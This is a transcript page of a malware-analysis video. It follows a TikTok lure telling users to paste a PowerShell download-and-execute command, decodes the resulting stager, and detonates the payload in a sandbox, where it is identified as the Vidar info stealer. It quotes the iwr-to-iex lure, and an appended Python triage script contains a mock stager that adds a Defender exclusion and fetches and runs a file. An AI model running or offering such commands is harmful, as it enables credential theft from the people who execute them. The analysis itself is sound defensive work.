REPORT THIS ACCOUNT

John Hammond · Beginner · 🔐 Cybersecurity · 1y ago

Key Takeaways

The video analyzes a TikTok account posting fake instructions to install cracked software, which is actually malware. It shows how to retrieve the PowerShell stager safely with curl.exe instead of running it, decode its base64 variables, and detonate the downloaded payload in a sandbox, where it is identified as the Vidar info stealer. The video is sponsored by Keeper Security, whose privileged access management product is presented in a sponsor segment.

Full Transcript

"To get the ChatGPT Pro client with the new O3 model on Windows, press the Windows button plus R, type PowerShell and run it. In the PowerShell window, type this command and press Enter. Wait a few moments for the installation process to complete." Well, that's got to be malware. This TikTok account, called "the shell Shield", has repeatedly been posting videos and clips to install cracked software for things like ChatGPT, Office 365, CapCut, Adobe Premiere, Photoshop and all these different things, but they're all lies, and these videos have thousands of views; some of them have over 100,000 views. What they're telling you to do: when you press the Windows key and R on your keyboard to open up the Run dialog box, that lets you run a command like PowerShell, and you open it up and you enter iwr. That's an alias for Invoke-WebRequest, to download contents from the internet. When you pipe it to IEX, another PowerShell alias for Invoke-Expression, you're executing and running arbitrary code on your computer. You don't know what it's actually doing, and in this case it's installing malware.

Let me show you. I'm inside of my Windows 11 virtual machine, and if I were to open up the Run dialog box with that hotkey, Windows and R on my keyboard, and open up PowerShell (I'll full-screen this and make the text a little bit bigger so you can see), if I type in iwr, that's trying to run the cmdlet Invoke-WebRequest to download something from the internet. So let's try to go to one of those URLs in a web browser like Firefox. Say we went to that website they reference in the video, like chatgpt.keyto.cc. Navigating to this in our web browser actually tells us it's 403 Forbidden, because the server is making sure that you request this via the PowerShell command: it's actually checking your user agent, or the client that you use to connect to the website. And this iwr, as I mentioned, is an alias in PowerShell; we can see all the others with Get-Alias, and there are tons of these, but iwr stands for Invoke-WebRequest, and that IEX that it's piped to with that vertical bar character means Invoke-Expression. That is the detonator; that's what's going to trigger and invoke the code that you just pulled down from an untrusted location.

Let's try and run that command without piping it to IEX: iwr chatgpt.keyto.cc, as an example. You can take a look at the output here. It is a PowerShell object, so we'd have to drill down to actually see the real content, but it returns an HTTP status code of 200, not the 403 Forbidden we just saw within Firefox. So here's the magic trick behind the scenes: the website is really looking for PowerShell in your user agent. So let's use a different program to be able to retrieve the contents of the website. I'll use curl.exe, and the .exe is important here, because curl on its own is another alias in PowerShell for Invoke-WebRequest, but curl.exe, the actual binary, is still included within Windows. So I'll use -H (dash, capital H) to specify a header, and I'll include my user agent, without even being a full, natural, real string for a user agent; let's just say PowerShell, and then let's grab that same URL, chatgpt.keyto.cc. Now we get a lot more output. We see the real content that it returns, and it is code that will be executed on your system.

But what does this code actually do? Let's try and make some sense of it. This is all PowerShell syntax, so let's put it in a text editor so we can actually explore. I like to use Sublime Text, but you can of course use whatever you'd prefer. If I set the syntax here to PowerShell we've got some nice syntax highlighting, but take a look: all the words that are denoted with a dollar sign prefix are variables in PowerShell, and it's putting together some interesting data, and all these variables are base64 encoded, or a different representation that it will decode later on. You can see this down below with the FromBase64String commands, all making changes to the variables defined above. Then you can see it creates a hidden folder by joining together an environment variable for your local app data with a new random GUID, or unique identifier. It creates this as a directory and then creates an exclusion in your antivirus, Windows Defender. Now this usually requires admin privileges, but malware authors and hackers and cyber criminals like to think that if you're running this on your laptop or your own personal computer, you probably are a local admin of that device. Then you can see it download something else based off those variables, that Invoke-WebRequest full command. It makes the newly created hidden folder actually hidden via the file system attributes, adds the exclusion, and then starts a whole new process, or a new program, running on your computer. If anything errors or goes wrong in this try/catch block it will exit, but if not it'll just say, and lie to you, "an error occurred during activation, please try and run it again."

So now that we have a little bit more context as to what this is really doing and where the detonators are, well, all these variables and the decoding of base64 are probably fine for us to explore and interrogate. Let me copy these and I'll actually run them so we can evaluate and see what these values are when decoded within PowerShell. Back at our prompt, I'll honestly just paste these in and let them all evaluate. Then I want to echo, or display, these values so I know what they really are. To make this easy, I'm actually going to grab all of these lines and put them in a new buffer within Sublime Text. Then I'll use Ctrl+A to select everything, Ctrl+Shift+L to create multiple cursors, and I'll just grab from the very end of the line, removing all the stuff to have it decoded, but then I'll add an echo at the beginning so I can easily see the values as I paste that into my terminal. Take a look: now all of these values are readable; they're decoded from that encoded b64 format. You can see the download URL here is actually at this website, Roc cellular.com, filth that thing.exe. A little bit of behind the scenes: it looks like that PowerShell code has just been recently changed, because just a bit ago, while I was trying to go through this, it actually pointed to aol.com, which, if you go to that website, is seemingly some fake, I don't know, real or legitimate, maybe compromised website made to look like some company offering some services, but again, it's just serving malware. Here is some of the info from while I was looking through that, testing with spotify.keyto.cc; really any subdomain, or whatever application or program you supply, doesn't even have to be a real thing: sp.whatever, or even no subdomain or program provided at all, keyto.cc, would return all the same content, and when we actually got to decode these, this would return that aol.com files sl.exe.

I've actually received two different emails about this from two different folks, so thank you so much for keeping me aware, and big thanks to the folks that uploaded the sample, or the actual executable, to Hybrid Analysis, or shared the hash so we could track it down on other services like VirusTotal. So now I've gotten that main.exe, the program and payload, downloaded, and we can start to take a look at it and see what it really does. But before we do, please let me take a quick second to tell you about the sponsor of today's video, Keeper Security.

Managing privileged access is one of the toughest challenges in cybersecurity today. Every organization, even my own, needs a way to seamlessly secure and manage access to critical resources like credentials, servers, web apps, databases and workloads, but it's tough with today's environments that have both legacy platforms and modern cloud infrastructure. That is where Keeper PAM comes in. I've had the chance to try it myself, and I've got to say, it's impressive. The platform is intuitive, powerful and fits seamlessly into any tech stack. Keeper PAM gives you complete visibility, security and control over every user and device in your organization. Whether you're working across multi-cloud environments, on-prem systems or remote workloads, Keeper PAM has you covered, with features like passwordless access to all infrastructure, even machines that don't natively support it; just-in-time access, so you can grant time-limited access to resources without exposing credentials; automatic password rotation, which you can just set and forget for ultimate peace of mind and protection of service accounts; and even session recording, so you can track activity across SSH, RDP, database connections and more. Whether it's managing privileged sessions, tunneling into SSH clients and database management tools, or securing multi-cloud environments, Keeper PAM just works, and when it comes to security it's got everything you're looking for and more. They're FedRAMP and StateRAMP authorized, ISO certified, zero trust, zero knowledge, and the list keeps on going. So if you're ready to secure your users, data and infrastructure, check out Keeper PAM today with my link below in the video description, jh.live/keeper-pam. Huge thanks to Keeper for sponsoring this video.

All right, now first things first, let's try and see what this main.exe really is with the tool Detect It Easy. I'll go ahead and open it up, and I'll navigate to open up our main.exe. With that loaded, it looks like, oh, this is a Golang program, compiled with the programming language Go. Now you might use whatever reverse engineering tool you like if you're trying to take a look at the disassembly or make some sense of the operations of this program, whether you're using Ghidra or Binary Ninja; personally, I've found that IDA seems to do the best job of looking at Golang programs. So I have IDA installed, we can open that up, and I'll select our main.exe. I'm okay to let it do whatever it will do; I believe it should be able to analyze it just fine and make some sense of the Golang symbols and function names, or at least a little bit more sense than just the randomly named things. IDA will take a little bit of time to cruise through this, but it does a pretty good job of tracking down functions that are pertinent to the main application, or the program you're really looking at, and then all the other packages or libraries that the Golang language could import in or use, like bytes, fmt for format strings, bufio, things that you're used to in the Golang programming language. Golang has a couple of different idiosyncrasies when you're trying to take a look at it in a disassembler like this. I believe main_main will take us to the main function and we can try to make sense of this, but oftentimes runtime_morestack_noctxt will sort of bring us right back to where we started at the beginning of the function call, and this seems to be pretty common throughout all the other functions we look at in Go.

If I press F5 and just sort of trust, hey, can the decompiler make some sense of this? Well, the main function apparently just loops forever and sleeps for an ungodly amount of time, so main_main isn't all that it could do here. main_init, I think, will just as easily get called; we could double-click on this and try to make some sense of it. IDA might stumble here and there, and I'll admit I am not the sharpest when it comes to disassembling Golang code, and even within IDA, everything that I've tried to find has either been a little outdated or just not super-duper modern, so please, in the comments, let me know, give me that feedback on what I could do to get a little bit smarter looking at Go code here. I know that it's not using null-terminated strings like C would be, so all the other things that it might try to make sense of are going to look like a very, very long syntax string. With that, it's kind of hard to make sense of each and every thing that it does here, but you can see everything for functions that it might load from other DLLs, and Win32 API functions like you saw, probably all the lazy DLL and lazy proc loading that is the norm for working with that in Golang. Hey, pulling up ntdll.dll, maybe getting some functions like VirtualAlloc, VirtualProtect, stuff to mess with memory, etc., etc. But I'm not extremely clear where this goes when we have main_init_0 and then func3_4, etc., etc. We could keep clicking into each of these and trying to make some sense of them, and then maybe find where it calls presumably obfuscated functions like this "ztz l y JM" whatever, and then others, "XL RP IQ", blah blah blah. But I'm going to be brutally honest: I have not been able to trace it. Clicking through these, you see kind of a similar structure for each; maybe a couple of them will eventually call those other strangely named functions, but I'm going to assume runtime_newproc, whenever we find it, will execute another process, or maybe a whole other binary that it's extracting out. We can see a lot of the other libraries that it uses, like crypto, so maybe it's safe to assume there is some encrypted data in here that it'll just carve out of itself. Looking at a couple of the other functions, maybe you can see exactly that: crypto AES NewCipher, NewGCM with nonce and tag size, and then eventually maybe it invokes it, calls it. Static analysis for Go, I'm going to struggle, not going to lie. Clicking around we can see some interesting stuff, like trying to walk or move through different directories like C:\Windows to navigate and look through the rest of your file system, but putting together the logic and structure of this to know what happens when is just tough.

So I will opt for dynamic analysis and try to just run this malware and see what it does. Well, we could totally try to make some sense of this using tools from Sysinternals like Procmon, or Process Monitor, and try to trace different API calls and let it detonate. I really don't want to do that, even inside of my own virtual machine, because you never know, and in this case we'll kind of take the high road: let's use an online sandbox like ANY.RUN, where we can just upload this and try to see it in action. I like to upload the entire zip archive, where we could have gotten this from, and then put it on the desktop so that I can extract it manually; that's the benefit of the interactive sandbox here. I'll set the operating system to Windows 11, give us a little bit more time, and then let's just try and run it. Once ANY.RUN has this all staged, let me go ahead and extract this out to the desktop. We can just put it there and I'll enter the password; usually for all malware samples that is "infected". You can see the password "infected" as I've typed it in; we'll click OK. Now that that's created, let me simply rename it to add the .exe extension at the end, and I'll double-click on it to let it run.

You can see the process started way over on the right-hand side, and ANY.RUN is tracking a couple of different things, just kind of natural default boilerplate Microsoft shenanigans, but while this fires up maybe it'll start to do something interesting. Oh, okay, looks like it is going to query the registry, and let me move my face out of the way here. There is functionality for communication over the UDP network, okay, some YARA signatures that are tracking that application based on Golang, cool, it can track that already. Obviously nothing is happening on the screen, but oh, what is that? It spawned a child process, BitLockerToGo, oh, and it's tracking Bad News Bears with that one: Vidar stealer. Oh, it even got the config out of it, okay. And then a lot of Microsoft Edge processes being spawned, CPO stuff starting to spin up, I don't know what that might be doing, but BitLockerToGo, which it just dumped, is clearly bad. Vidar stealer: Vidar is an info stealer, and there are many of them; you might know of RedLine or Raccoon stealer, plenty of others that will try to track down other information on your computer, to grab passwords, to grab cookies, things that are saved as you navigate to different web pages. The Vidar mutex has been found; I think that's the most definitive thing found, the name "approve April", one of the signatures left behind from that malware strain or family. It's still running this process, but it has not finished yet, although ANY.RUN is certainly saying this is not good: steals credentials from web browsers, and you can see a lot of the information that it pulls here. It's trying to read out of Opera in this case, one of the web browsers; we could take a look at some others, looks like Thunderbird, maybe some email clients, potential things for Moonchild Productions, I'm not sure about that one. Actions of stealing personal data: we can see it probably tracking down Google Chrome, Google Chrome user data, like the Local State, maybe cookies and passwords present there, default past history, previous things that you've been navigating to and browsing through with your web pages. And this is the norm, right? This is for every single possible web browser: it'll try to extract the credentials, the passwords, your autofill data, maybe the saved credentials, addresses, bank information, or stuff like credit cards you use to make purchases online. It's going to steal all this information, bundle it up and then try to forward it to some external resource, so the hacker, the cyber criminal here, the fraudster, scammer, what is it, "Shield shell" or "shell Shield" TikTok account, could now use this for whatever badness they want to do.

Even functionality for taking screenshots, that was tracked down with some signatures from YARA. I don't think ANY.RUN will give us a lot of good detail on that, yeah, just where it could be in the binary. Enumerating installed software, process communications with Telegram, possibly using it as an attacker C2. Oh, this was mentioned in the email that we got; I wonder if we could track down the URL. A little bit more information might be available as we explore more in ANY.RUN, but did BitLockerToGo finish? Okay, yeah, that process has ended. Let's explore some of the other things. Obviously BitLockerToGo is what's going to be making all these HTTP requests; that's the suspicious one, going to, I don't know what flag that is, I'm not cultured for the rest of the world. Does it go to Telegram? Let's see what's in the connections tab for BitLockerToGo; oh yeah, there is the t.me Telegram messenger. Can we see the traffic there, what it is uploading, or where it is going to? Not a lot is visible; we can assume a lot of this will be encrypted, right? We saw some of the capability, even if it was in the original stager, before it got to this BitLockerToGo binary. Then it goes to webd disk.lat.org, sketch, and MS Edge, called over and over again, keeps going to weird places, but I'm not positive why. If any of you have insight, again, please don't hesitate, give me that feedback, I'd love to be schooled, let me know in the comments. Part of me thinks cryptocurrency mining, but I don't want to say that with any certainty. Making a lot of communication to this 8889924573 stuff there; that must be another location where it's probably exfiltrating a lot of the data that it just stole. Oh, and goodness, you probably couldn't even see that IP address because my stupid face is in the way.

ANY.RUN said it could track down the config though, right? The CFG button, does that give me any cool insight? Oh, C2, the Telegram user "B4 cha 0000 oo", let me take a look at that one, and a URL for a Steam Community profile. Oh, "B4 Chow 00", that's our bad actor here, and there's the link, like, okay, telling us now webd disk.lat.org; you can see probably a pipe used as the delimiter there. But is this page real? Okay, returning a 404; it's probably going to be receiving the information and capturing it there. But this "o m05", I believe, is like a campaign ID for this Vidar stealer instance, correct? And ANY.RUN had a Steam profile, like, is it storing the locations of where to exfiltrate out to with either Telegram account information or Steam profile information? Obviously malware can do that, right, but yeah, whoa, take a look: exact same campaign ID, "o main 05", and then a different IP address. Does that correspond to that "web load rat" thing? But that's not the 88 IP address we saw in ANY.RUN, so I'm curious what all these kind of are. Let me check Censys: 65109, that's the one that we saw from the Steam profile, that is in Finland, okay, and the HTTP redirects to Wikipedia, nice, but that's just the homepage. I'm sure the endpoints that it would end up working with are going to be pointing it towards whatever it will do to retrieve the info. How about our webis lat.org? Yeah, yeah, yeah, okay, that's the 8889924573.

Back inside of ANY.RUN and the dynamic sandbox, can we take a closer look at more of the things that this does? We could obviously explore all the stuff that it's doing for info stealing, but I don't know if all that'll be too interesting. It had a certificate with BitLockerToGo; that is, like, is that a natural location in Windows? Oh yeah, BitLockerToGo.exe, there. But did they do some process injection with that, to spawn it and then put malware in it, right? Because obviously we saw the VirtualAlloc, the VirtualProtect shenanigans; it very well could have, because this is a Microsoft process. The process dump included a couple of things here; the modified files are interesting, a lot of Microsoft cache things, and a JSON text, that's actually something we could explore, but these are all the things with Microsoft Edge, right, putting up on that port 9223. I again would love your input, because this is something that I'm not super certain of: what are they doing here and why? That does not seem pertinent to info stealing. But look at all the stuff that they drop here, C:\ProgramData uas ZZ, and they do this over and over and over again for different files. At the end of all the processes that fired, after MS Edge we did see cmd.exe run, and if I double-click, or if I actually explore this, the main information tells me that they ran cmd.exe with a timeout of 10 seconds to delay some execution, as ANY.RUN notes, and then rd to remove directory, based off of, okay, uas ZZ, the exact same subdirectory that we're seeing they're staging all the other stuff from. BitLockerToGo, the modified files, puts it all there, and what are these binaries? They are SQLite databases, very much likely the browser information, because your web browser, Google Chrome or Firefox or whatever, stores a lot of those in local SQLite databases. In the connections tab, though, we certainly see that Telegram call, and then everything else that it might be doing with that external C2, or at least the place where it's exfiltrating this all out to, 888991253, over in Germany.

With all that said, you are not installing cracked software for ChatGPT, or access to Office 365, or CapCut, or the full activated install of Windows, or Adobe Premiere, or Adobe Acrobat, or Adobe Photoshop. It is an info stealer, it is the Vidar info stealer, and it is malware that you are putting on your computer to steal your passwords, your credentials, cookies, sessions, anything. So please, for goodness' sake, report this user, report account, frauds and scams, I mean, is that even right? Is there a section for, like, encouraging the download and distribution of malware? Posting inappropriate content, misinformation, whatever the heck, as long as you do it, as long as this account gets taken down, and those domains and anything we can track down as part of the attack chain here. It's Bad News Bears; don't fall for this. Anything that tells you to open up the Run dialog box and paste in PowerShell code that you don't know what it does: don't do it.

Let me take one last look, right: rather than having this be executed with the pipe to IEX, or Invoke-Expression, if we curl down the contents we can see that rogue PowerShell; we can see the base64 data that we could decode to get to that main.exe, served on that a solver.com. Now, keeping it easy, literally just using CyberChef, yeah, there is that. Now I believe they put it back to that other one, but trying to download it, is it alive? It's still alive, still hosted; "file contains a virus or malware", thank you. Big thanks to the folks that had shared this with me. I wish I could have had a little bit more elite, cool, sophisticated stuff looking through Golang and ripping it up in IDA or Ghidra or Binary Ninja, but honestly, sometimes, look, you get faster answers with dynamic analysis, and it's worth still taking a look and having the understanding of what you are running and executing on your computer. With all that said, thank you so much for watching, hope you enjoyed this video. Please do all those YouTube algorithm things, like, comment, subscribe, and please do give some love to our sponsors, link in the video description. I'll see you in the next video.
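As an added example (my own code, not the script from the video or anything from the account it describes), here is a small Python triage script that does what the walkthrough above does by hand: it pulls the double-quoted base64 literals out of a retrieved PowerShell stager, decodes them, and flags the behaviours the video describes (a download piped to IEX, FromBase64String, a random GUID folder under LOCALAPPDATA, a Defender exclusion, a second-stage download, the Hidden attribute, Start-Process, and the fake "activation" error). The stager and lure it runs on are constructed mock-ups with placeholder hosts, not the real samples.

```python
"""Static triage for a PowerShell stager of the kind walked through above.

Decodes base64 string literals first, so URLs that only exist in encoded form
are still found, then matches the behaviours described in the video.
"""
import base64
import re

# Constructed mock of the stager (assumed shape, placeholder host). The download
# URL and file name only appear after base64 decoding, as in the real script.
SAMPLE_STAGER = r"""
$u = "aHR0cDovL2V4YW1wbGUuaW52YWxpZC9tYWluLmV4ZQ=="
$n = "bWFpbi5leGU="
$url  = [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($u))
$name = [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($n))
$dir = Join-Path $env:LOCALAPPDATA ([guid]::NewGuid().ToString())
New-Item -ItemType Directory -Path $dir | Out-Null
try {
    Add-MpPreference -ExclusionPath $dir
    Invoke-WebRequest -Uri $url -OutFile (Join-Path $dir $name)
    (Get-Item $dir).Attributes = 'Hidden'
    Start-Process (Join-Path $dir $name)
} catch { exit }
Write-Host "An error occurred during activation. Please try to run it again."
"""

# Constructed lure line of the kind the TikTok clips tell viewers to paste.
SAMPLE_LURE = "iwr http://chatgpt.example.invalid | iex"

# Double-quoted runs of base64 alphabet (8+ chars) with optional padding.
B64_LITERAL = re.compile(r'"([A-Za-z0-9+/]{8,}={0,2})"')
URL_RE = re.compile(r"https?://[^\s\"'<>)]+")

# Behaviour -> regex, applied to the script plus its decoded strings.
INDICATORS = {
    "download-and-execute (iwr | iex)":
        r"\b(?:iwr|Invoke-WebRequest|curl|wget)\b[^\n|]*\|\s*(?:iex|Invoke-Expression)\b",
    "base64-decoded strings": r"FromBase64String",
    "random GUID folder under LOCALAPPDATA":
        r"\$env:LOCALAPPDATA[^\n]*NewGuid|NewGuid[^\n]*\$env:LOCALAPPDATA",
    "Defender exclusion added": r"Add-MpPreference\s+-ExclusionPath",
    "second-stage download": r"(?:Invoke-WebRequest|iwr)\b[^\n]*-OutFile",
    "folder hidden via attributes": r"\.Attributes\s*=\s*['\"]?Hidden",
    "spawns downloaded file": r"\bStart-Process\b",
    "fake 'activation' error message": r"error occurred during activation",
}


def decode_base64_literals(script: str) -> dict:
    """Return {literal: decoded text} for quoted literals that are valid base64
    and decode to printable UTF-8. Binary blobs and non-base64 words are skipped.
    (-EncodedCommand payloads are UTF-16LE and would need that codec instead.)"""
    decoded = {}
    for literal in B64_LITERAL.findall(script):
        try:
            raw = base64.b64decode(literal, validate=True)  # rejects bad padding
        except ValueError:
            continue
        try:
            text = raw.decode("utf-8")
        except UnicodeDecodeError:
            continue
        if text.isprintable():
            decoded[literal] = text
    return decoded


def triage(script: str) -> dict:
    """Decode literals, then report matched behaviours, URLs and a verdict."""
    decoded = decode_base64_literals(script)
    haystack = script + "\n" + "\n".join(decoded.values())
    hits = [name for name, pattern in INDICATORS.items()
            if re.search(pattern, haystack, re.IGNORECASE)]
    urls = sorted(set(URL_RE.findall(haystack)))
    # A bare download-piped-to-IEX line is enough on its own; otherwise
    # require several of the stager behaviours together.
    likely = "download-and-execute (iwr | iex)" in hits or len(hits) >= 3
    return {
        "decoded": decoded,
        "indicators": hits,
        "urls": urls,
        "verdict": "likely malicious stager" if likely else "review manually",
    }


if __name__ == "__main__":
    import json
    import sys

    if len(sys.argv) > 1:  # triage a script saved with curl.exe -o
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            text = fh.read()
    else:
        text = SAMPLE_STAGER
    print(json.dumps(triage(text), indent=2))
```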

Original Description

https://jh.live/keeper-pam || Keeper PAM offers a privileged access management solution for enterprise grade protection all in one unified platform -- keep your users, data, and environment secure with Keeper! https://jh.live/keeper-pam

Learn Cybersecurity and more with Just Hacking Training: https://jh.live/training
See what else I'm up to with: https://jh.live/newsletter
🏆 Attend ContinuumCon, the practical online cybersecurity conference that never ends! Livestream begins June 20th, 2025: https://jh.live/continuumcon
Learn Coding: https://jh.live/codecrafters
Host your own VPN: https://jh.live/openvpn

WATCH MORE:
Dark Web & Cybercrime Investigations: https://www.youtube.com/watch?v=_GD5mPN_URM&list=PL1H1sBF1VAKVmjZZr162aUNCt2Uy5ozAG&index=4
Malware & Hacker Tradecraft: https://www.youtube.com/watch?v=LKR8cdfKeGw&list=PL1H1sBF1VAKWMn_3QPddayIypbbITTGZv&index=5

📧 JOIN THE NEWSLETTER ➡ https://jh.live/newsletter
🙏 SUPPORT THE CHANNEL ➡ https://jh.live/patreon
🤝 SPONSOR THE CHANNEL ➡ https://jh.live/sponsor
🌎 FOLLOW ALONG ➡ https://jh.live/twitter ↔ https://jh.live/linkedin ↔ https://jh.live/discord ↔ https://jh.live/instagram ↔ https://jh.live/tiktok
💥 SEND ME MALWARE ➡ https://jh.live/malware
🔥 YOUTUBE ALGORITHM ➡ Like, Comment, & Subscribe!
The video shows how to analyze a social-media malware lure without running it: retrieving the PowerShell stager with curl.exe and a spoofed user agent, decoding its base64 variables, identifying the Go-compiled payload with Detect It Easy and IDA, and detonating it in the ANY.RUN sandbox, where YARA signatures, the extracted configuration and the network activity identify it as the Vidar info stealer with Telegram and Steam profiles used to locate its C2.

Key Takeaways
  1. The lure tells victims to paste a PowerShell command (iwr piped to iex) that downloads and executes code from the internet.
  2. The site returns 403 Forbidden unless the request looks like it came from PowerShell; curl.exe with a spoofed User-Agent header retrieves the script for analysis without executing it.
  3. The stager decodes base64-encoded variables, creates a hidden random-GUID folder under the user's local app data, and adds a Windows Defender exclusion before downloading and starting the payload.
  4. Keeper Security, the video's sponsor, is presented as a tool for managing privileged access.
  5. Sandbox detonation with YARA signatures and HTTP request tracking identifies the payload as the Vidar info stealer.
  6. Vidar's extracted configuration points to a Telegram user and a Steam Community profile as places it looks up its C2.
  7. The payload runs inside a spawned BitLockerToGo.exe process, possibly via process injection.
  8. Stolen browser data (SQLite databases of credentials, cookies and history) is exfiltrated to an external IP address.
💡 The video's core message is not to paste PowerShell commands you don't understand into the Run dialog, and to report accounts that spread these lures; it also includes a sponsor segment on Keeper PAM, a privileged access management platform.
